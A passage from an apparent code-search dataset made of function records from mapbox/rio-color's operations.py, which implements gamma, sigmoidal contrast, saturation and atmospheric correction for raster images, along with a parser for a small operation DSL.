adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L9-L97 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | gamma | python | def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g) | r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L100-L123 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | simple_atmo_opstring | python | def simple_atmo_opstring(haze, contrast, bias):
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops | Make a simple atmospheric correction formula. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L144-L151 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | simple_atmo | python | def simple_atmo(rgb, haze, contrast, bias):
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output | A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%) | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L154-L181 | [
"def gamma(arr, g):\n r\"\"\"\n Gamma correction is a nonlinear operation that\n adjusts the image's channel values pixel-by-pixel according\n to a power-law:\n\n .. math:: pixel_{out} = pixel_{in} ^ {\\gamma}\n\n Setting gamma (:math:`\\gamma`) to be less than 1.0 darkens the image and\n setti... | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | _op_factory | python | def _op_factory(func, kwargs, opname, bands, rgb_op=False):
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f | create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L184-L204 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
